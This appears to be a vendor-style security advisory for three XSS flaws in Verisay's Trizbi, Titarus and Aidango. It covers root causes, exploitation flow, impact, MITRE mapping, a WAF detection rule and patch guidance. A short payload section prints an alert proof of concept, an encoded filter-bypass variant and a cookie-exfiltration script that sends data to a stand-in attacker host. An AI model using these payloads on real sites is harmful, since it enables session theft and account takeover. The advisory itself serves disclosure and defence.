Vendor: Verisay Communication and Information Technology Industry and Trade Ltd. Co.
Affected Products: Trizbi, Titarus, Aidango
Affected Versions: All releases before 2.144.4
Vulnerability Class: Improper Neutralization of Input During Web Page Generation (XSS)
Attack Vector: Remote (HTTP/HTTPS)
User Interaction Required: Yes (viewing a crafted page or object)
Exploit Complexity: Low
Exploit Availability: Public, no exploit kit required
Fix Availability: Yes (official vendor patch)
Consolidated Risk Overview
These vulnerabilities allow attackers to inject malicious JavaScript code into trusted web pages.
Once triggered, the attacker’s code executes inside the victim’s browser, inheriting the same trust level as the application itself.
This effectively breaks the browser’s same-origin trust model and enables session theft, account takeover, and data exfiltration.
CVE-2025-2406 — XSS Vulnerability in Trizbi
Summary
- CVE ID: CVE-2025-2406
- Severity: High
- CVSS v3.1 Score: 7.4
- Vulnerability Type: Stored and Reflected XSS
- Exploitability: Remote
- Exploit Maturity: Weaponizable with basic web skills
Root Cause
Trizbi does not consistently sanitize or encode user-controlled input before rendering it into HTML responses.
Fields that accept free-form text are reflected or stored without enforcing output encoding.
Exploitation Flow
- Attacker submits a malicious script into an input field or request parameter
- The application stores or reflects the input verbatim
- A victim loads the affected page
- The browser executes attacker-controlled JavaScript
Expanded Impact
- Theft of active session cookies
- Silent account takeover
- Execution of unauthorized actions on behalf of the victim
- Injection of fake UI elements to harvest credentials
CVE-2025-2405 — XSS Vulnerability in Titarus
Summary
- CVE ID: CVE-2025-2405
- Severity: High
- CVSS v3.1 Score: 7.4
- Vulnerability Type: Reflected XSS
- Exploitability: Remote
Root Cause
User-supplied data in HTTP parameters is embedded directly into the response page without proper HTML escaping.
The absence of server-side validation allows malicious payloads to execute immediately when a crafted URL is visited.
Exploitation Flow
- Attacker crafts a malicious URL containing JavaScript payload
- Victim is lured via email, chat, or embedded link
- Payload executes as soon as the page loads
Expanded Impact
- Credential harvesting through fake login overlays
- Forced redirection to attacker-controlled sites
- Browser-based malware delivery
- Abuse of trusted domain reputation
CVE-2025-2307 — XSS Vulnerability in Aidango
Summary
- CVE ID: CVE-2025-2307
- Severity: High
- CVSS v3.1 Score: 7.4
- Vulnerability Type: Stored XSS
- Exploitability: Remote
Root Cause
Aidango processes user input without enforcing proper encoding at output time.
Malicious scripts stored in backend data sources are later rendered directly in user-facing pages.
Exploitation Flow
- Attacker injects script into a stored field
- Application saves payload without sanitization
- Any user accessing the affected record executes the script
Expanded Impact
- Large-scale compromise of multiple user accounts
- Persistent attacker presence until payload removal
- Abuse of administrative sessions if viewed by privileged users
Example XSS Payloads
Basic proof-of-concept:
<script>alert(document.domain)</script>Session exfiltration:
<script>fetch('https://attacker.site/?c='+document.cookie)</script>Encoded variant (bypasses naive filters):
%3Cscript%3Ealert(1)%3C/script%3EMITRE ATT&CK Mapping
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Drive-by Compromise | T1189 |
| Credential Access | Web Session Cookie Theft | T1550 |
| Collection | Input Capture | T1056 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Impact | Account Takeover | T1531 |
Detection & Monitoring Strategy
What to Watch For
<script>tags in HTTP parameters or POST bodies- JavaScript event handlers (
onerror,onload,onclick) - Encoded payloads (
%3C,%3E,%22) - Sudden spike in session invalidations
Recommended Log Sources
- Web server access logs
- Application request/response logs
- Web Application Firewall (WAF) logs
- SIEM correlation alerts
Sample Detection Rule (WAF / IDS)
alert http any any -> web_server any (
msg:"Possible XSS Attempt - Verisay Application";
pcre:"/(\<script\>|\%3Cscript|\bonerror\b|\bonload\b|\beval\b)/i";
sid:20252406;
)
Proof-of-Concept Status
- No custom exploit code required
- Easily reproducible using:
- Browser developer tools
- Burp Suite
- Manual crafted HTTP requests
Attack success depends only on user interaction, not authentication bypass.
Remediation & Hardening
Official Patch (Required)
Upgrade all affected products to version 2.144.4 or later using the official Verisay patch channel only.
Additional Security Controls
- Enforce strict server-side input validation
- Apply context-aware output encoding
- Implement Content Security Policy (CSP)
- Set cookies with
HttpOnlyandSecureflags - Conduct regular application security testing
Final Takeaway
These XSS vulnerabilities are:
- Easy to exploit
- Low-cost for attackers
- High-impact for users and organizations
Left unpatched, they can directly lead to account compromise, data leakage, and abuse of trust across the application ecosystem.
